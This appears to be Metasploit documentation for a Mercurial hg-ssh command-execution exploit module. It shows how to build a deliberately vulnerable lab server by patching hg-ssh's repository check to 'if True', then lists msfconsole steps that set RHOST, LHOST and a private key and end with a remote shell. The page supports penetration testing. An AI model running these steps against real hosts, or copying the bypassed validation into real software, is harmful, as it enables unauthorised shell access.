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Path: blob/master/documentation/modules/exploit/linux/ssh/
Views: 11789
Vulnerable Application
This module was successfully tested against:
Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
Vulnerable Server Setup Steps
Install mercurial on your test server
Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper
vi $(which hg-ssh)
if repo in allowed paths:
withif True:
cmd = ['-R', repo, 'serve', 'stdio']
withcmd = ['-R', path, 'serve', 'stdio']
Setup a user with SSH pubkey auth
Create a test repo in the users home directory and add a commit
mkdir -p repos/repo1
cd repos/repo1
echo "hello world" > README
hg add README
hg commit -m "Adds README"
Restrict user in authorized_keys to hg-ssh binary only
command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY
Verify SSH user can authenticate (should prompt and prevent a shell)
Verify SSH user commands are not allows (should prevent arbitrary commands)
ssh [email protected] ifconfig
Verification Steps
Start msfconsole
use exploit/linux/ssh/mercurial_ssh_exec
set RHOST <ip>
set LHOST <ip>
set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa
You should get a shell.